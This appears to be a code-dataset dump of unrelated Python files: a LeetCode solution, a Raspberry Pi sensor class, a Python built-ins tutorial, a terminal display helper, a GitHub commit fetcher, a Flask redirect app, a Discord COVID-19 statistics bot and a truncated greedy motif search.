text stringlengths 38 1.54M |
|---|
class Solution(object):
def dailyTemperatures(self, T):
"""
:type T: List[int]
:rtype: List[int]
"""
wait = [0]*len(T) # days to wait for a warmer day
stack = [] # list of tuples (temp, index)
for i in range(len(T)):
if stack and T[i] > stack[-1][0]:
while stack and T[i] > stack[-1][0]:
temp, index = stack.pop()
wait[index] = i - index
stack.append((T[i], i))
return wait
|
import RPi.GPIO as GPIO
class TrackSensor(object):
def __init__(self, db):
"""
setting 5-way's pin number to variable
:param db: setup.py's pin numbers
"""
self.left2 = db['track_left2']
self.left1 = db['track_left1']
self.center = db['track_center']
self.right1 = db['track_right1']
self.right2 = db['track_right2']
self.setup()
def setup(self):
# Just setup 5-way sensor using setup.py's db.
GPIO.setup(self.left2, GPIO.IN)
GPIO.setup(self.left1, GPIO.IN)
GPIO.setup(self.center, GPIO.IN)
GPIO.setup(self.right1, GPIO.IN)
GPIO.setup(self.right2, GPIO.IN)
def getStatus(self):
"""
This function give us sensing result value.
:return:
"""
left2 = GPIO.input(self.left2)
left1 = GPIO.input(self.left1)
center = GPIO.input(self.center)
right1 = GPIO.input(self.right1)
right2 = GPIO.input(self.right2)
return left2, left1, center, right1, right2
def getReversedStatus(self):
"""
This function works as same as getStatus().
Difference is result value.
this function's all result value is reversed.
:return:
"""
reverse = lambda x: 1-x
left2 = reverse(GPIO.input(self.left2))
left1 = reverse(GPIO.input(self.left1))
center = reverse(GPIO.input(self.center))
right1 = reverse(GPIO.input(self.right1))
right2 = reverse(GPIO.input(self.right2))
return left2, left1, center, right1, right2
|
#abs 절댓값
print(abs(3)); print(abs(-3.5))
#all 모두 참이면 Treu / 하나라도 거짓이 있으면 False
print(all([0,3,4,5]))
#any 하나라도 참이면 True / 모두 거짓일 때 False
print(any([1,2,3,0]))
#dir
print(dir([1,2,3]))
#divmod a를 b로 나는 몫과 나머지를 튜플 형태로 돌려줌
print(divmod(7,3))
#enumerate 순서가 있는 자료형을 입력으로 받아 인덱스 값을 포함하는 enumerate 객체를 돌려줌
for i, name in enumerate(['body','foo','bar']):
print(i, name)
#eval(expression) 실행 가능한 문자열을 입력으로 받아 문자열 실행한 결괏값 돌려줌
print(eval('1+2')); print(eval("'hi'+'a'")); print(eval('divmod(4,3)'))
#filter
def positive(l):
result = []
for i in l:
if i>0:
result.append(i)
return result
print(positive([1,-3,2,0,-5,6]))
def positive2(x):
return x>0
print(list(filter(positive2, [1,-3,2,0,-5,6])))
print(list(filter(lambda x: x>0,[1,-3,2,0,-5,6])))
#int
print(int('11',2)); print(int('1A',16))
#list
print(list("python"))
#pow 제곱
print(pow(2,4))
#range
print(list(range(5)))
print(list(range(5,10)))
print(list(range(1,10,2))) #숫자 사이의 거리
#round
print(round(5.678,2))
#sorted
print(sorted("zero"))
#type
print(type("abd"))
print(type([])) |
# -*- coding: utf-8 -*-
import sys, os
sys.path.append('../siftsample')
# ここまでおまじない
import numpy, pylab
from siftsample import SiftSample
class Prob25(SiftSample):
def _process_image(self, resultname, params):
""" 画像を処理してファイルに結果を保存する """
if self._is_color:
self.convert_grey()
if self._image_name[-3:] != 'pgm':
# pgmファイルを作成する
self._image_obj.save('tmp.pgm')
self._image_name = 'tmp.pgm'
m_cmmd = str("mser " + self._image_name + " --frames=tmp.mser")
s_cmmd = str("sift " + self._image_name +" --output=" + resultname + " " + params + "read-frames=tmp.mser")
os.system(m_cmmd)
os.system(s_cmmd)
self._sift_name = resultname
os.remove(self._image_name)
os.remove("tmp.mser")
|
import sys, time
class Display:
def __init__(self, width, height, xoffset=0, yoffset=0, reversehori=False, reversevert=False):
self.width = width
self.height = height
self.xoffset = xoffset
self.yoffset = yoffset
self.reversehori = reversehori
self.reversevert = reversevert
self.xbufferoffset = 0
self.ybufferoffset = 0
self.xcursor = 0
self.ycursor = 0
def getsize(self):
return self.width, self.height
def getcursor(self):
return self.xcursor, self.ycursor
def getbufferoffset(self):
return self.xbufferoffset, self.ybufferoffset
def fillwindow(self, value=" "):
for i in range(self.yoffset, Display.height):
row = Display.data[i]
for j in range(self.xoffset, Display.width):
row[j] = value
def setbufferoffset(self, x, y):
if x < self.xbufferoffset:
self.xbufferoffset = x
elif x + 1 >= self.xbufferoffset + self.width:
self.xbufferoffset = x + 1 - self.width
self.xcursor = x - self.xbufferoffset
if y < self.ybufferoffset:
self.ybufferoffset = y
elif y + 1 >= self.ybufferoffset + self.height:
self.ybufferoffset = y + 1 - self.height
self.ycursor = y - self.ybufferoffset
def applyfile(self, fl):
data = fl.getdata()
x, y = fl.smartget()
x1, y1, x2, y2 = fl.getselection()
x1 -= self.xbufferoffset
y1 -= self.ybufferoffset
x2 -= self.xbufferoffset
y2 -= self.ybufferoffset
self.setbufferoffset(x, y)
yoffset = self.yoffset
if self.reversevert:
yoffset = max(0, self.height - self.yoffset - fl.len())
rows = min(fl.len() - self.ybufferoffset, self.height - yoffset)
xoffset = self.xoffset
if self.reversehori:
xoffset = max(0, self.width - self.xoffset - fl.maxlencolumn(self.ybufferoffset, self.ybufferoffset + self.height) + 1)
self.xcursoroffset = xoffset
self.ycursoroffset = yoffset
i = 0
while i < rows:
line = data[i + self.ybufferoffset]
columns = min(len(line) - self.xbufferoffset, self.width - xoffset)
j = 0
while j < columns:
char = line[j + self.xbufferoffset][:]
pre = ""
if (i > y1 or (i == y1 and j >= x1)) and (i < y2 or (i == y2 and j <= x2)):
pre = Display.color["black"] + Display.color["greyback"]
if char[0] == "\n":
char[0] = "^"
if char[0] == "\n":
char[0] = " "
elif char[0] == "\x1b":
char[0] = Display.color["cyan"] + "µ"
Display.data[i + yoffset][j + xoffset] = pre + char[3] + char[2] + char[1] + char[0]
j += 1
i += 1
def outputcursor(self):
return Display.translate(self.xcursor + self.xcursoroffset, self.ycursor + self.ycursoroffset)
def rgb_to_ansi(r, g, b, background=False):
return "\x1b[%d;5;%dm" % (48 if background else 38, 16 + 36 * round(r) + 6 * round(g) + round(b))
def grey_to_ansi(v, background=False):
return "\x1b[%d;5;%dm" % (48 if background else 38, 232 + v)
def flipansi(ansi):
return ansi[ : 2] + ("3" if ansi[3] == "4" else "4") + ansi[3 : ]
def translate(x, y):
return "\x1b[%d;%dH" % (y + 1, x + 1)
def screen(show):
if show:
return Display.buffer1
return Display.buffer2
def cursor(show):
if show:
return Display.cursor1
return Display.cursor2
def setdisplay(width, height, xoffset=0, yoffset=0):
Display.width, Display.height, Display.xoffset, Display.yoffset = width, height, xoffset, yoffset
Display.data = [[" "] * Display.width for _ in range(Display.height)]
def filldisplay(value=" "):
for row in Display.data:
for j, char in enumerate(row):
row[j] = value
def outputdisplay():
output = ""
lastcolor = ""
i = 0
for line in Display.data:
output += Display.translate(Display.xoffset, Display.yoffset + i)
for char in line:
char, color = char[-1], char[ : -1]
if lastcolor != color:
output += Display.normal + (color if color else "")
lastcolor = color
output += char
i += 1
return output + Display.normal
def startloading(width):
sys.stdout.write(Display.cursor(False))
sys.stdout.flush()
Display.loading = True
wheel = ["|/-\\", "\\|/-", "-\\|/", "/-\\|"]
wheel = [(w + "Loading" + w) * 1000 for w in wheel]
i = 0
while Display.loading:
m = max(0, len(wheel[i]) - Display.width) // 2
w = wheel[i][m : m + Display.width]
l = max(0, width - len(w))
sys.stdout.write("\x1b[%dD" % width + w + " " * l + "\x1b[%dD" % (l - 1))
sys.stdout.flush()
i = (1 + i) % len(wheel)
time.sleep(0.1)
sys.stdout.write("\x1b[2K\x1b[%dD" % width)
sys.stdout.flush()
def stoploading(thread):
if Display.loading:
sys.stdout.write(Display.cursor(True))
sys.stdout.flush()
Display.loading = False
thread.join()
Display.cursor1 = "\x1b[?25h"
Display.cursor2 = "\x1b[?25l"
Display.buffer1 = "\x1b[?1049h"
Display.buffer2 = "\x1b[?1049l"
Display.normal = "\x1b[0m"
Display.crosscolor = Display.grey_to_ansi(7, True)
Display.color = {"grey" : Display.rgb_to_ansi(3, 3, 3), "white" : Display.rgb_to_ansi(5, 5, 5),
"red" : Display.rgb_to_ansi(4, 1, 1), "blue" : Display.rgb_to_ansi(2, 3, 5),
"green" : Display.rgb_to_ansi(1, 4, 1), "yellow" : Display.rgb_to_ansi(4, 4, 1),
"pink" : Display.rgb_to_ansi(4, 1, 4), "cyan" : Display.rgb_to_ansi(1, 4, 4),
"purple" : Display.rgb_to_ansi(3, 1, 5), "clear" : "",
"black" : Display.rgb_to_ansi(0, 0, 0),
"greyback" : Display.flipansi(Display.rgb_to_ansi(3, 3, 3)),
"blueback" : Display.flipansi(Display.rgb_to_ansi(1, 1, 3))}
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#makedocument_ns.py
###example################################
#python makedocument_ns.py directory_path
##########################################
import sys
from github import Github
#get token
t = open('token','r')
token = t.read()
token = token.rstrip('\n')
#Create GitHub INSTANCE
g = Github(token)
t.close()
#show repositoory from repository fullname
repo_name = raw_input("Repository_Name>")
#take repository info
repo = g.get_repo(repo_name)
argvs = sys.argv
try:
path = argvs[1]
except IndexError:
print "please specify directory path to save txt file!!"
sys.exit()
doc = open(path+'/repo_files.txt','w')
revision = repo.get_commits()
n=0
for rev in revision:
n=n+1
print "commit..."
print n
doc.write(rev.commit.message.encode('utf-8').replace("\n",""))
doc.write("\n")
if n == 50:
break
|
from flask import Flask, redirect, url_for
app = Flask(__name__)
@app.route('/')
def index():
return '<a href="/goto">Go to</a>'
@app.route('/goto')
def goto():
return redirect(url_for('user_page'))
@app.route('/user')
def user_page():
return 'User page'
|
import datetime as dt
import logging
import os
import time
from typing import Union
import discord
from aiomysql import IntegrityError
from discord.ext import commands
from discord_slash.context import SlashContext
import src.utils as utils
from src.plotting import plot_bar_daily, plot_csv
logger = logging.getLogger("covid-19")
async def list_countries_command(bot, ctx: Union[commands.Context, SlashContext]):
text = ""
i = 1
data = await utils.get(bot.http_session, "/all")
text = ""
overflow_text = ""
embeds = []
for c in data:
overflow_text += c["country"] + ", "
if len(overflow_text) >= utils.DISCORD_LIMIT:
embed = discord.Embed(
description=text.rstrip(", "),
color=utils.COLOR,
timestamp=utils.discord_timestamp()
)
text = overflow_text
overflow_text = ""
embeds.append(embed)
text = overflow_text
if text:
embed = discord.Embed(
description=text.rstrip(", "),
color=utils.COLOR,
timestamp=utils.discord_timestamp()
)
embeds.append(embed)
for i, _embed in enumerate(embeds):
_embed.set_author(
name=f"All countries affected by Coronavirus COVID-19 - Page {i + 1}",
icon_url=bot.author_thumb
)
_embed.set_footer(text=utils.last_update(data[0]["lastUpdate"]),
icon_url=bot.user.avatar_url)
_embed.set_thumbnail(url=bot.thumb + str(time.time()))
await ctx.send(embed=_embed)
async def info_command(bot, ctx: Union[commands.Context, SlashContext]):
data = await utils.get(bot.http_session, "/all")
text = utils.string_formatting(data)
embed = discord.Embed(
description=text,
color=utils.COLOR,
timestamp=utils.discord_timestamp()
)
embed.set_author(
name=f"All countries affected by Coronavirus COVID-19",
url="https://www.who.int/home",
icon_url=bot.author_thumb
)
embed.set_thumbnail(url=bot.thumb + str(time.time()))
embed.set_footer(text="coronavirus.jessicoh.com/api | " + utils.last_update(data[0]["lastUpdate"]),
icon_url=bot.user.avatar_url)
if not os.path.exists(utils.STATS_PATH):
history_confirmed = await utils.get(bot.http_session, f"/history/confirmed/total")
history_recovered = await utils.get(bot.http_session, f"/history/recovered/total")
history_deaths = await utils.get(bot.http_session, f"/history/deaths/total")
await plot_csv(
utils.STATS_PATH,
history_confirmed,
history_recovered,
history_deaths)
with open(utils.STATS_PATH, "rb") as p:
img = discord.File(p, filename=utils.STATS_PATH)
embed.set_image(url=f'attachment://{utils.STATS_PATH}')
await ctx.send(file=img, embed=embed)
async def country_command(bot, ctx: Union[commands.Context, SlashContext], countries):
if len(countries):
data = await utils.get(bot.http_session, "/all")
embeds = []
text = overflow_text = ""
i = 0
stack = []
countries = list(map(lambda x: x.lower(), countries))
for d in data:
for country in countries:
bold = "**" if i % 2 == 0 else ""
data_country = d['country'].lower()
if (data_country.startswith(country) or
d['iso2'].lower() == country or
d['iso3'].lower() == country) \
and data_country not in stack:
overflow_text += f"{bold}{d['country']} : {d['totalCases']:,} confirmed [+{d['newCases']:,}] - {d['totalRecovered']:,} recovered - {d['totalDeaths']:,} deaths [+{d['newDeaths']:,}]{bold}\n"
stack.append(data_country)
i += 1
if len(overflow_text) >= utils.DISCORD_LIMIT:
embed = discord.Embed(
title="Countries affected",
description=text,
timestamp=utils.discord_timestamp(),
color=utils.COLOR
)
overflow_text = ""
text = overflow_text
if text:
embed = discord.Embed(
description=text,
timestamp=utils.discord_timestamp(),
color=utils.COLOR
)
embeds.append(embed)
for i, _embed in enumerate(embeds):
_embed.set_author(
name=f"Countries affected",
icon_url=bot.author_thumb
)
_embed.set_footer(
text=f"coronavirus.jessicoh.com/api/ | {utils.last_update(data[0]['lastUpdate'])} | Page {i + 1}",
icon_url=bot.user.avatar_url)
_embed.set_thumbnail(url=bot.thumb + str(time.time()))
await ctx.send(embed=_embed)
else:
await ctx.send("No country provided")
async def stats_command(bot, ctx: Union[commands.Context, SlashContext], country):
is_log = False
graph_type = "Linear"
embed = discord.Embed(
description=utils.mkheader(),
timestamp=dt.datetime.utcnow(),
color=utils.COLOR
)
if len(country) == 1 and country[0].lower() == "log" or not len(country):
data = await utils.get(bot.http_session, f"/all/world")
splited = country
if len(splited) == 1 and splited[0].lower() == "log":
embed.set_author(
name="Coronavirus COVID-19 logarithmic stats",
icon_url=bot.author_thumb
)
is_log = True
path = utils.STATS_LOG_PATH
graph_type = "Logarithmic"
elif not len(country):
path = utils.STATS_PATH
else:
try:
if splited[0].lower() == "log":
is_log = True
joined = ' '.join(country[1:]).lower()
data = await utils.get(bot.http_session, f"/all/{joined}")
path = data["iso2"].lower() + utils.STATS_LOG_PATH
else:
joined = ' '.join(country).lower()
data = await utils.get(bot.http_session, f"/all/{joined}")
path = data["iso2"].lower() + utils.STATS_PATH
if not os.path.exists(path):
history_confirmed = await utils.get(bot.http_session, f"/history/confirmed/{joined}")
history_recovered = await utils.get(bot.http_session, f"/history/recovered/{joined}")
history_deaths = await utils.get(bot.http_session, f"/history/deaths/{joined}")
await plot_csv(
path,
history_confirmed,
history_recovered,
history_deaths,
logarithmic=is_log)
except Exception as e:
path = utils.STATS_PATH
confirmed = data["totalCases"]
recovered = data["totalRecovered"]
deaths = data["totalDeaths"]
active = data["activeCases"]
if data['iso2']:
embed.set_author(
name=f"Coronavirus COVID-19 {graph_type} graph - {data['country']}",
icon_url=f"https://raw.githubusercontent.com/hjnilsson/country-flags/master/png250px/{data['iso2'].lower()}.png"
)
else:
embed.set_author(
name=f"Coronavirus COVID-19 {graph_type} graph - {data['country']}",
icon_url=bot.author_thumb
)
embed.add_field(
name="<:confirmed:688686089548202004> Confirmed",
value=f"{confirmed:,}"
)
embed.add_field(
name="<:recov:688686059567185940> Recovered",
value=f"{recovered:,} (**{utils.percentage(confirmed, recovered)}**)"
)
embed.add_field(
name="<:_death:688686194917244928> Deaths",
value=f"{deaths:,} (**{utils.percentage(confirmed, deaths)}**)"
)
embed.add_field(
name="<:_calendar:692860616930623698> Today confirmed",
value=f"+{data['newCases']:,} (**{utils.percentage(confirmed, data['newCases'])}**)"
)
embed.add_field(
name="<:_calendar:692860616930623698> Today deaths",
value=f"+{data['newDeaths']:,} (**{utils.percentage(confirmed, data['newDeaths'])}**)"
)
embed.add_field(
name="<:bed_hospital:692857285499682878> Active",
value=f"{active:,} (**{utils.percentage(confirmed, active)}**)"
)
embed.add_field(
name="<:critical:752228850091556914> Serious critical",
value=f"{data['seriousCritical']:,} (**{utils.percentage(confirmed, data['seriousCritical'])}**)"
)
if data["totalTests"]:
percent_pop = ""
if data["population"]:
percent_pop = f"(**{utils.percentage(data['population'], data['totalTests'])}**)"
embed.add_field(
name="<:test:752252962532884520> Total test",
value=f"{data['totalTests']:,} {percent_pop}"
)
embed.add_field(
name="<:population:768055030813032499> Population",
value=f"{data['population']:,}"
)
if not os.path.exists(path):
history_confirmed = await utils.get(bot.http_session, f"/history/confirmed/total")
history_recovered = await utils.get(bot.http_session, f"/history/recovered/total")
history_deaths = await utils.get(bot.http_session, f"/history/deaths/total")
await plot_csv(
path,
history_confirmed,
history_recovered,
history_deaths,
logarithmic=is_log)
with open(path, "rb") as p:
img = discord.File(p, filename=path)
embed.set_footer(
text="coronavirus.jessicoh.com/api/ | " +
utils.last_update(data["lastUpdate"]),
icon_url=bot.user.avatar_url
)
embed.set_thumbnail(
url=bot.thumb + str(time.time())
)
embed.set_image(url=f'attachment://{path}')
await ctx.send(file=img, embed=embed)
def get_idx(args, val):
try:
return args.index(val)
except ValueError:
return -1
def convert_interval_type(_type):
try:
return {
"hours": 1,
"days": 24,
"weeks": 168,
"hour": 1,
"day": 24,
"week": 168
}[_type]
except KeyError:
return 1
def unpack_notif(args, val):
try:
idx = int(get_idx(args, val))
interval_type = args[len(args) - 1].lower()
interval = int(args[idx + 1])
if idx != -1 and interval >= 1 and interval <= 24:
country = " ".join(args[0:idx])
else:
interval = 1
country = " ".join(args)
except:
interval = 1
country = " ".join(args)
print(country.lower(), interval * convert_interval_type(interval_type), interval_type)
return country.lower(), interval * convert_interval_type(interval_type), interval_type
class ContextError(Exception):
def __init__(self, *args: object) -> None:
super().__init__(*args)
async def notification_command(bot, ctx: Union[commands.Context, SlashContext], country="all", interval: int = None, interval_type=None, state: list=[]):
if type(ctx) == commands.Context:
country, interval, interval_type = unpack_notif(
state,
"every"
)
print(country, interval, interval_type)
guild_permissions = ctx.message.author.guild_permissions
elif type(ctx) == SlashContext:
interval = int(interval)
guild_permissions = ctx.author.guild_permissions
else:
raise ContextError(f"Context error : {ctx}")
if not guild_permissions.administrator:
return await ctx.send("You need to have Administrator permission to set notification on !")
try:
prefix = await bot.getg_prefix(ctx.guild.id)
except:
prefix = "c!"
if len(state) or interval is not None:
all_data = await utils.get(bot.http_session, "/all/")
try:
data = utils.get_country(all_data, country)
try:
await bot.insert_notif(str(ctx.guild.id), str(ctx.channel.id), country, interval)
except IntegrityError:
await bot.update_notif(str(ctx.guild.id), str(ctx.channel.id), country, interval)
finally:
if country != "all":
embed = discord.Embed(
description=f"You will receive a notification in this channel on data update. `{prefix}notififcation disable` to disable the notifications"
)
embed.set_author(
name="Notifications successfully enabled",
icon_url=f"https://raw.githubusercontent.com/hjnilsson/country-flags/master/png250px/{data['iso2'].lower()}.png"
)
embed.add_field(
name="Country",
value=f"**{data['country']}**"
)
embed.add_field(
name="Next update",
value=f"**{interval // convert_interval_type(interval_type)} {interval_type}**"
)
elif country == "all":
embed = discord.Embed(
description=f"You will receive a notification in this channel on data update. `{prefix}notififcation disable` to disable the notifications"
)
embed.set_author(
name="Notifications successfully enabled",
icon_url=bot.author_thumb
)
embed.add_field(
name="Country",
value=f"**World stats**"
)
embed.add_field(
name="Next update",
value=f"**{interval // convert_interval_type(interval_type)} {interval_type}**"
)
except Exception as e:
embed = discord.Embed(
title=f"{prefix}notification",
description=f"Make sure that you didn't have made any mistake, please retry\n`{prefix}notification <country | disable> [every NUMBER] [hours | days | weeks]`\n__Examples__ : `{prefix}notification usa every 3 hours` (send a message to the current channel every 3 hours about United States), `{prefix}notification united states every 1 day`, `{prefix}notification disable`"
)
embed.add_field(
name="Report this error to the developer please ! :heart:",
value=f"{type(e).__name__} : {e}"
)
logger.exception(e, exc_info=True)
if country == "disable":
await bot.delete_notif(str(ctx.guild.id))
embed = discord.Embed(
title="Notifications successfully disabled",
description="Notifications are now interrupted in this channel."
)
else:
embed = discord.Embed(
title=f"{prefix}notification",
description=f"Make sure that you didn't have made any mistake, please retry\n`{prefix}notification <country | disable> [every NUMBER] [hours | days | weeks]`\n__Examples__ : `{prefix}notification usa every 3 hours` (send a message to the current channel every 3 hours about United States), `{prefix}notification united states every 1 day`, `{prefix}notification disable`"
)
embed.color = utils.COLOR
embed.timestamp = utils.discord_timestamp()
embed.set_thumbnail(url=bot.thumb + str(time.time()))
embed.set_footer(
text="coronavirus.jessicoh.com/api/ | " +
utils.last_update(all_data[0]["lastUpdate"]),
icon_url=bot.user.avatar_url
)
await ctx.send(embed=embed)
async def track_command(bot, ctx: Union[commands.Context, SlashContext], *country):
try:
prefix = await bot.getg_prefix(ctx.guild.id)
except:
prefix = "c!"
if not len(country):
embed = discord.Embed(
description=f"No country provided. **`{prefix}track <COUNTRY>`** work like **`{prefix}country <COUNTRY>`** see `{prefix}help`",
color=utils.COLOR,
timestamp=utils.discord_timestamp()
)
embed.set_author(
name=f"{prefix}track",
icon_url=bot.author_thumb
)
elif ''.join(country) == "disable":
embed = discord.Embed(
description=f"If you want to reactivate the tracker : **`{prefix}track <COUNTRY>`**",
color=utils.COLOR,
timestamp=utils.discord_timestamp()
)
embed.set_author(
name="Tracker has been disabled!",
icon_url=bot.author_thumb
)
try:
await bot.delete_tracker(str(ctx.author.id))
except:
pass
else:
all_data = await utils.get(bot.http_session, "/all/")
country = ' '.join(country)
data = utils.get_country(all_data, country)
if data is not None:
try:
await bot.insert_tracker(str(ctx.author.id), str(ctx.guild.id), country)
except IntegrityError:
await bot.update_tracker(str(ctx.author.id), country)
embed = discord.Embed(
description=f"{utils.mkheader()}You will receive stats about {data['country']} in DM",
color=utils.COLOR,
timestamp=utils.discord_timestamp()
)
embed.set_author(
name="Tracker has been set up!",
icon_url=f"https://raw.githubusercontent.com/hjnilsson/country-flags/master/png250px/{data['iso2'].lower()}.png"
)
else:
embed = discord.Embed(
description="Wrong country selected.",
color=utils.COLOR,
timestamp=utils.discord_timestamp()
)
embed.set_author(
name=f"{prefix}track",
icon_url=bot.author_thumb
)
embed.set_thumbnail(url=bot.thumb + str(time.time()))
embed.set_footer(
text="coronavirus.jessicoh.com/api/",
icon_url=bot.user.avatar_url
)
await ctx.send(embed=embed)
async def region_command(bot, ctx: Union[commands.Context, SlashContext], *params):
if len(params):
country, state = utils.parse_state_input(*params)
try:
if state == "all":
history_confirmed = await utils.get(bot.http_session, f"/history/confirmed/{country}/regions")
history_recovered = await utils.get(bot.http_session, f"/history/recovered/{country}/regions")
history_deaths = await utils.get(bot.http_session, f"/history/deaths/{country}/regions")
embeds = utils.region_format(
history_confirmed, history_recovered, history_deaths)
for i, _embed in enumerate(embeds):
_embed.set_author(
name=f"All regions in {country}",
icon_url=bot.author_thumb
)
_embed.set_footer(
text=f"coronavirus.jessicoh.com/api/ | Page {i + 1}",
icon_url=bot.user.avatar_url)
_embed.set_thumbnail(
url=bot.thumb + str(time.time()))
await ctx.send(embed=_embed)
return
else:
path = state.lower().replace(" ", "_") + utils.STATS_PATH
history_confirmed = await utils.get(bot.http_session, f"/history/confirmed/{country}/{state}")
history_recovered = await utils.get(bot.http_session, f"/history/recovered/{country}/{state}")
history_deaths = await utils.get(bot.http_session, f"/history/deaths/{country}/{state}")
confirmed = list(history_confirmed["history"].values())[-1]
deaths = list(history_deaths["history"].values())[-1]
try:
is_us = False
recovered = list(
history_recovered["history"].values())[-1]
active = confirmed - (recovered + deaths)
except:
is_us = True
recovered = 0
active = 0
if not os.path.exists(path):
await plot_csv(
path,
history_confirmed,
history_recovered,
history_deaths,
is_us=is_us)
embed = discord.Embed(
description=utils.mkheader(),
timestamp=dt.datetime.utcnow(),
color=utils.COLOR
)
embed.set_author(
name=f"Coronavirus COVID-19 - {state.capitalize()}",
icon_url=bot.author_thumb
)
embed.add_field(
name="<:confirmed:688686089548202004> Confirmed",
value=f"{confirmed:,}"
)
embed.add_field(
name="<:_death:688686194917244928> Deaths",
value=f"{deaths:,} (**{utils.percentage(confirmed, deaths)}**)"
)
if recovered:
embed.add_field(
name="<:recov:688686059567185940> Recovered",
value=f"{recovered:,} (**{utils.percentage(confirmed, recovered)}**)"
)
embed.add_field(
name="<:bed_hospital:692857285499682878> Active",
value=f"{active:,} (**{utils.percentage(confirmed, active)}**)"
)
except Exception as e:
logger.exception(e, exc_info=True)
raise utils.RegionNotFound(
"Region not found, it might be possible that the region isn't yet available in the data.")
else:
return await ctx.send("No arguments provided.")
with open(path, "rb") as p:
img = discord.File(p, filename=path)
embed.set_footer(
text=f"coronavirus.jessicoh.com/api/ | {list(history_confirmed['history'].keys())[-1]}",
icon_url=bot.user.avatar_url
)
embed.set_thumbnail(
url=bot.thumb + str(time.time())
)
embed.set_image(url=f'attachment://{path}')
await ctx.send(file=img, embed=embed)
async def daily_command(bot, ctx: Union[commands.Context, SlashContext], *country):
embed = discord.Embed(
description=utils.mkheader(),
timestamp=dt.datetime.utcnow(),
color=utils.COLOR
)
try:
if country:
data_confirmed = await utils.get(bot.http_session, f"/daily/confirmed/{' '.join(country).lower()}")
data_recovered = await utils.get(bot.http_session, f"/daily/recovered/{' '.join(country).lower()}")
data_deaths = await utils.get(bot.http_session, f"/daily/deaths/{' '.join(country).lower()}")
path = data_confirmed["iso2"] + "daily.png"
embed.set_author(
name=f"Coronavirus COVID-19 Daily cases graph - {data_confirmed['name']}",
icon_url=f"https://raw.githubusercontent.com/hjnilsson/country-flags/master/png250px/{data_confirmed['iso2'].lower()}.png"
)
else:
data_confirmed = await utils.get(bot.http_session, f"/daily/confirmed/total")
data_recovered = await utils.get(bot.http_session, f"/daily/recovered/total")
data_deaths = await utils.get(bot.http_session, f"/daily/deaths/total")
path = "daily_world.png"
embed.set_author(
name=f"Coronavirus COVID-19 Daily cases graph - World",
icon_url=bot.author_thumb
)
if not os.path.exists(path):
await plot_bar_daily(path, data_confirmed, data_recovered, data_deaths)
except Exception as e:
logger.exception(e)
return await ctx.send("Please provide a valid country.")
embed.add_field(
name="<:confirmed:688686089548202004> Recent confirmed",
value=f"{list(data_confirmed['daily'].keys())[-1]} : {list(data_confirmed['daily'].values())[-1]:,}"
)
embed.add_field(
name="<:recov:688686059567185940> Recent recovered",
value=f"{list(data_recovered['daily'].keys())[-1]} : {list(data_recovered['daily'].values())[-1]:,}"
)
embed.add_field(
name="<:_death:688686194917244928> Recent deaths",
value=f"{list(data_deaths['daily'].keys())[-1]} : {list(data_deaths['daily'].values())[-1]:,}",
inline=False
)
embed.set_thumbnail(
url=bot.thumb + str(time.time())
)
with open(path, "rb") as p:
img = discord.File(p, filename=path)
embed.set_image(url=f'attachment://{path}')
embed.set_footer(
text="coronavirus.jessicoh.com/api/",
icon_url=bot.user.avatar_url
)
await ctx.send(file=img, embed=embed)
async def news_command(bot, ctx: Union[commands.Context, SlashContext]):
if bot.news is None:
bot.news = utils.load_news()
embed = discord.Embed(
title=":newspaper: Recent news about Coronavirus COVID-19 :newspaper:",
timestamp=utils.discord_timestamp(),
color=utils.COLOR
)
sources = []
length = 0
max_size = 5800
for n in bot.news["articles"]:
source = n["source"]["name"]
if source not in sources:
sources.append(source)
else:
continue
try:
length += len(
f"🞄 **{source}** : {n['title']} {n['description']} [Link]({n['url']})")
if length >= max_size:
break
embed.add_field(name=f"🞄 **{source}** : {n['title']}",
value=f"{n['description']} [Link]({n['url']})",
inline=False)
except discord.errors.HTTPException:
break
embed.set_thumbnail(
url="https://avatars2.githubusercontent.com/u/32527401?s=400&v=4")
embed.set_footer(text="newsapi.org",
icon_url=bot.user.avatar_url)
await ctx.send(embed=embed)
|
import numpy as np
def read_input(filename):
input_file = open(filename, "r")
k, t = input_file.readline().strip().split(" ")
dnas = input_file.read().splitlines()
input_file.close()
return int(k), int(t), dnas
def profile_most_probable_kmer(genome, k, profile_matrix):
n = len(genome)
most_probable_pattern = genome[0:k]
most_probable_probability = 0
for i in range(0, n-k+1):
pattern = genome[i:i+k]
probability = 1
for offset, n in enumerate(pattern):
if n == 'A':
probability *= profile_matrix[0][offset]
elif n == 'C':
probability *= profile_matrix[1][offset]
elif n == 'G':
probability *= profile_matrix[2][offset]
elif n == 'T':
probability *= profile_matrix[3][offset]
else:
print('Weird string, Exiting...')
exit()
if probability > most_probable_probability:
most_probable_pattern = pattern
most_probable_probability = probability
return most_probable_pattern
# motifs is a n x k matrix, example chapter 2 section 3 step 3
# returns both the count matrix and the consensus string
def count_motifs(motifs, k):
# construct a count matrix of 0's which is a 4 x k matrix
count_matrix = [[0 for i in range(k)] for row in range(4)]
# Transpose matrix to count from each column
transposed_motifs = np.array(motifs).T.tolist()
# Use count() to count occurances in each column
consensus_string = ''
for i in range(0, len(transposed_motifs)):
count_matrix[0][i] = transposed_motifs[i].count('A')
count_matrix[1][i] = transposed_motifs[i].count('C')
count_matrix[2][i] = transposed_motifs[i].count('G')
count_matrix[3][i] = transposed_motifs[i].count('T')
# 'A' case, 'C' case, 'G' case and finally 'T' case
max_count = 0
popular_letter = ''
if count_matrix[0][i] > max_count:
max_count = count_matrix[0][i]
popular_letter = 'A'
if count_matrix[1][i] > max_count:
max_count = count_matrix[1][i]
popular_letter = 'C'
if count_matrix[2][i] > max_count:
max_count = count_matrix[2][i]
popular_letter = 'G'
if count_matrix[3][i] > max_count:
max_count = count_matrix[3][i]
popular_letter = 'T'
# building the consensus string
consensus_string += popular_letter
return count_matrix, consensus_string
def profile_motifs(count_matrix, t):
return (np.array(count_matrix)/t).tolist()
# Consensus is the consensus string broken down character wise in a list
def score_motifs(motifs, consensus, k):
score = 0
for i in range(0, len(motifs)):
for j in range(0, k):
if motifs[i][j] != consensus[j]:
score += 1
return score
def greedy_motif_search(k, t, dnas):
best_motifs = []
for i in range(0, len(dnas)):
first_kmer = dnas[i][0:k]
best_motifs.append(list(first_kmer))
for i in range(0, len(dnas[0])-k+1):
motifs = [list(dnas[0][i:i+k])]
for j in range(1, t):
# Create a Profile matrix from the current motifs collection
count_matrix, consensus_string = count_motifs(motifs, k)
profile_matrix = profile_motifs(count_matrix, len(motifs)) # number of rows of motifs to divide by
# Get next DNA most probable string to be added to our collection
next_motif = profile_most_probable_kmer(dnas[j], k, profile_matrix)
motifs.append(list(next_motif))
